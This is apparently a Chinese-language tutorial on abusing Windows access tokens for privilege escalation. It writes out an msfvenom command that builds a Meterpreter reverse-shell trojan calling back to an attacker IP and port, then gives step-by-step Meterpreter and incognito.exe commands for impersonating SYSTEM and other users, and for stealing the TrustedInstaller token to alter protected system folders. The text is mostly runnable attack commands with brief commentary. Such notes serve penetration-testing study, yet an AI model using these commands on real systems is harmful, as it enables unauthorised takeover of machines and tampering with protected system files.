文章目录
前言
windows中token有两种:
- Delegation token(授权令牌):用于交互会话登录,例如远程桌面
- Impersonation token(模拟令牌):用于非交互登录,例如dir远程主机的文c$
当我们拿到一台主机却不知道如何提权的时候,可以看看是否有高权限用户的token,如果有的话就有可能直接提权到administrator权限,这篇文章主要讲对token的利用。
通过msf实现
1.生成木马并以管理员权限运行
msfvenom -p windows/meterpreter/reverse_http -a x86 -f exe --platform windows -o 1.exe LHOST=172.16.250.1 LPORT=7777
2.实现提权到system
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
getuid
3.降级到普通用户
list_tokens -u
impersonate_token "DESKTOP-RMP8TTT\test"
getuid
这时候发现权限已经很低了,很多命令都执行不了。
不过用msf降权后就无法再进行提权了。
通过incognito工具实现
同样得在管理员权限下执行,普通用户权限使用的话几乎看不到可用的token。
下载地址:https://github.com/shanfenglan/test
1. 实现提权到system
incognito.exe list_tokens -u
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
2. 降权到普通user
incognito.exe list_tokens -u
incognito.exe execute -c "DESKTOP-RMP8TTT\test" cmd.exe
获取TrustedInstaller权限
只有TrustedInstaller权限能修改系统文件,例如C:\Windows\servicing路径下system权限也无法创建文件:
这时候我们想办法提权到TrustedInstaller:
1.首先开启TrustedInstaller服务
sc start TrustedInstaller
2.找到TrustedInstaller对应的pid
首先切换到meterpreter下:
ps | grep TrustedInstaller
确定了TrustedInstaller.exe的pid为10780
3.提权到system并使用steal_token命令进行令牌窃取
getsystem
steal_token 10780
4.切换到交互式cmd验证权限
whoami /groups
5.修改系统文件夹
确定文件能创建成功。